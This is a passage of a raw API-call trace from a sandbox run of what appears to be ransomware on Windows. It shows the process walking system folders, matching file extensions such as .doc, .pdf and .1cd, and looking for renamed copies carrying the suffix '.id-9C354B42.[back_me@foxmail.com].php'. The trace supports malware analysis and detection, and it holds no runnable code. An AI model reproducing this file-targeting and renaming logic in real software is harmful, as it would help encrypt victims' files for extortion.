[0241.945] lstrcmpiW (lpString1=".xlsx", lpString2="i.xml") returned -1 [0241.945] lstrlenW (lpString=".ppt") returned 4 [0241.945] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.945] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.946] lstrlenW (lpString=".zip") returned 4 [0241.946] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.946] lstrlenW (lpString=".rar") returned 4 [0241.946] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.946] lstrlenW (lpString=".bz2") returned 4 [0241.946] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.946] lstrlenW (lpString=".7z") returned 3 [0241.946] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.946] lstrlenW (lpString=".dbf") returned 4 [0241.946] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.946] lstrlenW (lpString=".1cd") returned 4 [0241.946] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.946] lstrlenW (lpString=".jpg") returned 4 [0241.946] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.946] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.946] lstrlenW (lpString=".doc") returned 4 [0241.946] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.946] lstrlenW (lpString=".docx") returned 5 [0241.946] lstrcmpiW (lpString1=".docx", lpString2="i.xml") returned -1 [0241.946] lstrlenW (lpString=".pdf") returned 4 [0241.946] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.946] lstrlenW (lpString=".xls") returned 4 [0241.946] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.947] lstrlenW (lpString=".xlsx") returned 5 [0241.947] lstrcmpiW (lpString1=".xlsx", lpString2="i.xml") returned -1 [0241.947] lstrlenW (lpString=".ppt") returned 4 [0241.947] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.947] lstrlenW (lpString=".zip") returned 4 [0241.947] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.947] lstrlenW (lpString=".rar") returned 4 [0241.947] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.947] lstrlenW (lpString=".bz2") returned 4 [0241.947] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.947] lstrlenW (lpString=".7z") returned 3 [0241.947] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.947] lstrlenW (lpString=".dbf") returned 4 [0241.947] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.947] lstrlenW (lpString=".1cd") returned 4 [0241.947] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 85 [0241.947] lstrlenW (lpString=".jpg") returned 4 [0241.947] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.947] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0241.947] lstrlenW (lpString="zh-dayi.xml") returned 11 [0241.948] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0241.948] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=11067) returned 1 [0241.948] CloseHandle (hObject=0x2bc) returned 1 [0241.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml")) returned 0x20 [0241.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.948] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.948] lstrlenW (lpString=".doc") returned 4 [0241.948] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.948] lstrlenW (lpString=".docx") returned 5 [0241.948] lstrcmpiW (lpString1=".docx", lpString2="i.xml") returned -1 [0241.948] lstrlenW (lpString=".pdf") returned 4 [0241.948] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.948] lstrlenW (lpString=".xls") returned 4 [0241.948] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.948] lstrlenW (lpString=".xlsx") returned 5 [0241.948] lstrcmpiW (lpString1=".xlsx", lpString2="i.xml") returned -1 [0241.948] lstrlenW (lpString=".ppt") returned 4 [0241.948] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.948] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.948] lstrlenW (lpString=".zip") returned 4 [0241.948] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.949] lstrlenW (lpString=".rar") returned 4 [0241.949] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.949] lstrlenW (lpString=".bz2") returned 4 [0241.949] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.949] lstrlenW (lpString=".7z") returned 3 [0241.949] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.949] lstrlenW (lpString=".dbf") returned 4 [0241.949] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.949] lstrlenW (lpString=".1cd") returned 4 [0241.949] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.949] lstrlenW (lpString=".jpg") returned 4 [0241.949] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.949] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.949] lstrlenW (lpString=".doc") returned 4 [0241.949] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.949] lstrlenW (lpString=".docx") returned 5 [0241.949] lstrcmpiW (lpString1=".docx", lpString2="i.xml") returned -1 [0241.949] lstrlenW (lpString=".pdf") returned 4 [0241.949] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.949] lstrlenW (lpString=".xls") returned 4 [0241.949] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.949] lstrlenW (lpString=".xlsx") returned 5 [0241.949] lstrcmpiW (lpString1=".xlsx", lpString2="i.xml") returned -1 [0241.949] lstrlenW (lpString=".ppt") returned 4 [0241.950] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.950] lstrlenW (lpString=".zip") returned 4 [0241.950] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.950] lstrlenW (lpString=".rar") returned 4 [0241.950] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.950] lstrlenW (lpString=".bz2") returned 4 [0241.950] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.950] lstrlenW (lpString=".7z") returned 3 [0241.950] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.950] lstrlenW (lpString=".dbf") returned 4 [0241.950] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.950] lstrlenW (lpString=".1cd") returned 4 [0241.950] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.950] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0241.950] lstrlenW (lpString=".jpg") returned 4 [0241.950] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.950] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0241.950] lstrlenW (lpString="zh-phonetic.xml") returned 15 [0241.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0241.951] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=10947) returned 1 [0241.951] CloseHandle (hObject=0x2bc) returned 1 [0241.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml")) returned 0x20 [0241.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.951] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.952] lstrlenW (lpString=".doc") returned 4 [0241.952] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.952] lstrlenW (lpString=".docx") returned 5 [0241.952] lstrcmpiW (lpString1=".docx", lpString2="c.xml") returned -1 [0241.952] lstrlenW (lpString=".pdf") returned 4 [0241.952] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.952] lstrlenW (lpString=".xls") returned 4 [0241.952] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.952] lstrlenW (lpString=".xlsx") returned 5 [0241.952] lstrcmpiW (lpString1=".xlsx", lpString2="c.xml") returned -1 [0241.952] lstrlenW (lpString=".ppt") returned 4 [0241.952] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.952] lstrlenW (lpString=".zip") returned 4 [0241.952] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.952] lstrlenW (lpString=".rar") returned 4 [0241.952] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.952] lstrlenW (lpString=".bz2") returned 4 [0241.952] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.952] lstrlenW (lpString=".7z") returned 3 [0241.952] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.952] lstrlenW (lpString=".dbf") returned 4 [0241.952] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.952] lstrlenW (lpString=".1cd") returned 4 [0241.952] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.952] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.952] lstrlenW (lpString=".jpg") returned 4 [0241.953] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.953] lstrlenW (lpString=".doc") returned 4 [0241.953] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.953] lstrlenW (lpString=".docx") returned 5 [0241.953] lstrcmpiW (lpString1=".docx", lpString2="c.xml") returned -1 [0241.953] lstrlenW (lpString=".pdf") returned 4 [0241.953] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.953] lstrlenW (lpString=".xls") returned 4 [0241.953] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.953] lstrlenW (lpString=".xlsx") returned 5 [0241.953] lstrcmpiW (lpString1=".xlsx", lpString2="c.xml") returned -1 [0241.953] lstrlenW (lpString=".ppt") returned 4 [0241.953] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.953] lstrlenW (lpString=".zip") returned 4 [0241.953] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.953] lstrlenW (lpString=".rar") returned 4 [0241.953] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.953] lstrlenW (lpString=".bz2") returned 4 [0241.953] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.953] lstrlenW (lpString=".7z") returned 3 [0241.953] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.953] lstrlenW (lpString=".dbf") returned 4 [0241.953] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.953] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.953] lstrlenW (lpString=".1cd") returned 4 [0241.954] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 85 [0241.954] lstrlenW (lpString=".jpg") returned 4 [0241.954] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.954] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0241.954] lstrlenW (lpString="main.xml") returned 8 [0241.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0241.954] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=38485) returned 1 [0241.954] CloseHandle (hObject=0x2bc) returned 1 [0241.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml")) returned 0x20 [0241.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned 73 [0241.954] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned 73 [0241.954] lstrlenW (lpString=".doc") returned 4 [0241.954] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.955] lstrlenW (lpString=".docx") returned 5 [0241.955] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0241.955] lstrlenW (lpString=".pdf") returned 4 [0241.955] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.955] lstrlenW (lpString=".xls") returned 4 [0241.955] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.955] lstrlenW (lpString=".xlsx") returned 5 [0241.955] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0241.955] lstrlenW (lpString=".ppt") returned 4 [0241.955] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.955] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned 73 [0241.955] lstrlenW (lpString=".zip") returned 4 [0241.955] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.955] lstrlenW (lpString=".rar") returned 4 [0241.955] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.955] lstrlenW (lpString=".bz2") returned 4 [0241.955] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.955] lstrlenW (lpString=".7z") returned 3 [0241.955] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.955] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned 73 [0241.955] lstrlenW (lpString=".dbf") returned 4 [0241.955] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 Thread: id = 58 os_tid = 0x630 [0241.363] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d43dd8 [0241.364] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d53de0 [0241.364] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e0d8 [0241.364] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb99c40 [0241.364] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e0f0 [0241.364] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x4180020 [0241.364] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e108 [0241.364] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e108, Size=0x20) returned 0xbbdcc0 [0241.364] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e108 [0241.364] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e108, Size=0x20) returned 0xbbdc98 [0241.364] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.364] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.364] Wow64DisableWow64FsRedirection (in: OldValue=0x356ff58 | out: OldValue=0x356ff58*=0x0) returned 1 [0241.364] lstrlenW (lpString="kernel32.dll") returned 12 [0241.364] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbdcc0 | out: hHeap=0xb00000) returned 1 [0241.364] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.365] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbbdc98 | out: hHeap=0xb00000) returned 1 [0241.365] Sleep (dwMilliseconds=0x64) [0241.556] lstrcmpiW (lpString1=".LOG1", lpString2=".php") returned -1 [0241.556] lstrlenW (lpString="BCD.LOG1") returned 8 [0241.556] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.579] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x356ff1c | out: lpFileSize=0x356ff1c*=0) returned 1 [0241.579] CloseHandle (hObject=0x244) returned 1 [0241.579] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.579] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.579] lstrlenW (lpString=".doc") returned 4 [0241.579] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0241.579] lstrlenW (lpString=".docx") returned 5 [0241.579] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0241.579] lstrlenW (lpString=".pdf") returned 4 [0241.579] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0241.579] lstrlenW (lpString=".xls") returned 4 [0241.579] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0241.579] lstrlenW (lpString=".xlsx") returned 5 [0241.579] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0241.579] lstrlenW (lpString=".ppt") returned 4 [0241.580] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.580] lstrlenW (lpString=".zip") returned 4 [0241.580] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString=".rar") returned 4 [0241.580] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString=".bz2") returned 4 [0241.580] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString=".7z") returned 3 [0241.580] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0241.580] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.580] lstrlenW (lpString=".dbf") returned 4 [0241.580] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.580] lstrlenW (lpString=".1cd") returned 4 [0241.580] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.580] lstrlenW (lpString=".jpg") returned 4 [0241.580] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.580] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.580] lstrlenW (lpString=".doc") returned 4 [0241.580] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString=".docx") returned 5 [0241.580] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0241.580] lstrlenW (lpString=".pdf") returned 4 [0241.580] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString=".xls") returned 4 [0241.580] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0241.580] lstrlenW (lpString=".xlsx") returned 5 [0241.581] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0241.581] lstrlenW (lpString=".ppt") returned 4 [0241.581] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0241.581] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.581] lstrlenW (lpString=".zip") returned 4 [0241.581] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0241.581] lstrlenW (lpString=".rar") returned 4 [0241.581] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0241.581] lstrlenW (lpString=".bz2") returned 4 [0241.581] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0241.581] lstrlenW (lpString=".7z") returned 3 [0241.581] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0241.581] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.581] lstrlenW (lpString=".dbf") returned 4 [0241.581] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0241.581] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.581] lstrlenW (lpString=".1cd") returned 4 [0241.581] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0241.581] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0241.581] lstrlenW (lpString=".jpg") returned 4 [0241.581] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0241.581] lstrcmpiW (lpString1=".ttf", lpString2=".php") returned 1 [0241.581] lstrlenW (lpString="jpn_boot.ttf") returned 12 [0241.581] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0241.664] GetFileSizeEx (in: hFile=0x248, lpFileSize=0x356ff1c | out: lpFileSize=0x356ff1c*=1984228) returned 1 [0241.666] CloseHandle (hObject=0x248) returned 1 [0241.669] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0241.675] GetFileAttributesW 